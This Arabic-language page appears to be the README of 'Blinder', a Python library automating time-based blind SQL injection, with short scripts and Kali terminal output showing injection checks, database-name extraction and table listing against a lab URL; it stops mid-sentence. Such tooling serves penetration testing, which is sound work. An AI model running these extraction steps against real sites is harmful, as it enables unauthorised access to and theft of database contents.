
مكتبة بايثون لأتمتة حقن SQL الأعمى القائم على الوقت
Blidner هي مكتبة بايثون صغيرة لأتمتة حقن SQL الأعمى القائم على الوقت باستخدام استعلامات محددة مسبقًا كدوال لأتمتة تطوير إثبات المفهوم السريع.
يمكنك تثبيت Blinder باستخدام الأمر التالي:
pip install blinder
أو عن طريق تنزيل المصدر واستيراده يدويًا إلى مشروعك.
لاستخدام blinder، تحتاج إلى استيراد الوحدة Blinder ثم البدء في استخدام الوظائف الرئيسية لـ Blinder.
يمكنك استخدام Blinder "مع الإصدار الحالي" للقيام بما يلي:
يمكنك التحقق من الحقن في عنوان URL باستخدام الكود التالي:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
ستكون نتيجة التنفيذ:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
يمكنك الحصول على اسم قاعدة البيانات باستخدام الكود التالي:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
وستكون النتائج:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
للحصول على أسماء الجداول يمكنك استخدام الكود التالي:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
وستكون النتائج:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
العديد من الميزات ستضاف قريبًا مثل: